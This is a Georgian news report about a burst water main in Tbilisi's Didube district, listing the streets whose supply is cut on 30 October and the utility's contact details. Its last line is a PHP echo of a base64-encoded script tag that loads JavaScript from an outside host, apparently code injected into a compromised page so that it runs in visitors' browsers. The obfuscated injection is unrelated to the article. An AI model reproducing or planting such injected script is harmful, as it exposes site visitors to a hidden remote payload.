celsiusi
ავერსი შნაიდერი

დიდუბის რაიონში, წერეთლის გამზირის N2ა-ს მიმდებარედ, დღეს, 30 ოქტომბერს, „ჯორჯიან უოთერ ენდ ფაუერის“ წყალსადენის ქსელი ავარიულად დაზიანდა.

„ჯორჯიან უოთერ ენდ ფაუერის“ ინფორმაციით, კომპანიის ტექნიკური ჯგუფი ადგილზეა მობილიზებული და ქსელის დაზიანებული მონაკვეთის აღსადგენად სამუშაოები აქტიურად მიმდინარეობს.

„აღიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც, დღეს, 30 ოქტომბერს, 14:00 საათიდან, საღამოს 22:00 საათამდე წყალმომარაგება შეეზღუდება:

დიდუბის რაიონში - წერეთლის გამზირის N1-103 და N2-128, აღმაშენებლის გამზირის N142-184 და N125-197; თამარ მეფის გამზირის ნაწილს; წინამძღვრიშვილის და ნინოშვილის ქუჩების ნაწილს, ცაბაძის, ფიფიების, ქურდიანის, ყიფიანის, დიდუბის, პასტერის, ვანის, აგლაძის, ხოშარაულის, ევდოშვილის, კედიას, თევდორე მღვდლის, ქუთაისის, გაფრინდაულის, გვეტაძის, ბაქრაძის, სამტრედიის, წყალტუბოს, მირცხულავს, კერესელიძის და მიმდებარე ქუჩებს.

„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის.

წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, „ფეისბუქისა“ და ვებ-გვერდის მეშვეობით http://www.gwp.ge“,- ნათქვამია ინფორმაციაში.

277
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");